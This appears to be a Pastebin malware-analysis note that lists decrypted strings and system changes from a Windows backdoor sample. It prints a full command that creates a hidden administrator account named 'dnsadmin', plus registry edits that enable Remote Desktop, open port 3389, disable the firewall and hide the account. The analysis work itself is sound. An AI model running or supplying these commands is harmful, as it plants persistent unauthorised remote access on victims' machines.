Fare9

Sample 42faac51f5bc73cfb10099850de5fc5bf18a3

Feb 26th, 2019
634
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.70 KB | None | 0 0
  1. Decrypted strings from 42faac51f5bc73cfb10099850de5fc5bf18a31c1 and how sample modified my system
  2.  
  3. Here you can find more samples found with yara rule: https://pastebin.com/7M1DWqGq
  4.  
  5. Decrypted and loaded APIs:
  6.  
  7. .data:0040CF00 RegQueryValueExA dd offset advapi32_RegQueryValueExA
  8. .data:0040CF04 RegSetValueExA dd offset advapi32_RegSetValueExA
  9. .data:0040CF08 RegCloseKey dd offset advapi32_RegCloseKey
  10. .data:0040CF0C RegOpenKeyExA dd offset advapi32_RegOpenKeyExA
  11. .data:0040CF10 RegCreateKeyExA dd offset advapi32_RegCreateKeyExA
  12. .data:0040CF14 RegCreateKeyA dd offset advapi32_RegCreateKeyA
  13. .data:0040CF18 WinExec dd offset kernel32_WinExec
  14. .data:0040CF1C GetWindowsDirectoryA dd offset kernel32_GetWindowsDirectoryA
  15. .data:0040CF20 Sleep dd offset kernel32_Sleep
  16. .data:0040CF24 GetModuleHandleW dd offset kernel32_GetModuleHandleW
  17. .data:0040CF28 LoadLibraryW dd offset kernel32_LoadLibraryW
  18. .data:0040CF2C GetProcAddress_0 dd offset kernel32_GetProcAddress
  19.  
  20.  
  21. Some of the decrypted strings (commands and more stuff):
  22.  
  23. C:\WINDOWS\System32\cmd.exe /c C:&cd\&cd windows&cd system32&net user dnsadmin waldo1215! /add&net user dnsadmin /FULLNAME:"DNS Host Account" /COMMENT:"built in the DNS subsystem." /EXPIRES:NEVER/Active:YES&net localgroup users dnsadmin /delete&net localgroup Administrators dnsadmin /add&net localgroup "Network Configurati on Operators" dnsadmin /add&net localgroup "Power Users" dnsadmin /add&exit
  24.  
  25. (Creates the file)
  26. C:\WINDOWS\system32\GroupPolicy\Machine\Registry.pol
  27.  
  28. (File content)
  29. REGISTRY KEY,REGISTRY VALUE,VALUE TYPE,DATA
  30. SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services,MaxInstanceCount,REG_DWORD,"00000007"
  31. SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services,fDenyTSConnections,REG_DWORD,"00000000"
  32.  
  33.  
  34. Those will be registry values changed from HKEY_LOCAL_MACHINE
  35.  
  36. Register = SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services
  37. fDenyTSConnections = 0
  38. MaxInstanceCount = 7
  39. Register = SYSTEM\CurrentControlSet\Control\Terminal Server
  40. fDenyTSConnections = 0
  41. fSingleSessionPerUser = 0
  42. Register = SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List
  43. 3389:TCP = 3389:TCP:*:Enabled:@xpsp2res.dll,-22009
  44. Register = SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
  45. EnableFirewall = 0
  46. Register = SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core
  47. EnableConcurrentSessions = 1
  48. PolicyAcOff = 5
  49. Register = SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
  50. EnableConcurrentSessions = 1
  51. AllowMultipleTSSessions = 1
  52. Register = SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
  53. dnsadmin = 0
Add Comment
Please, Sign In to add comment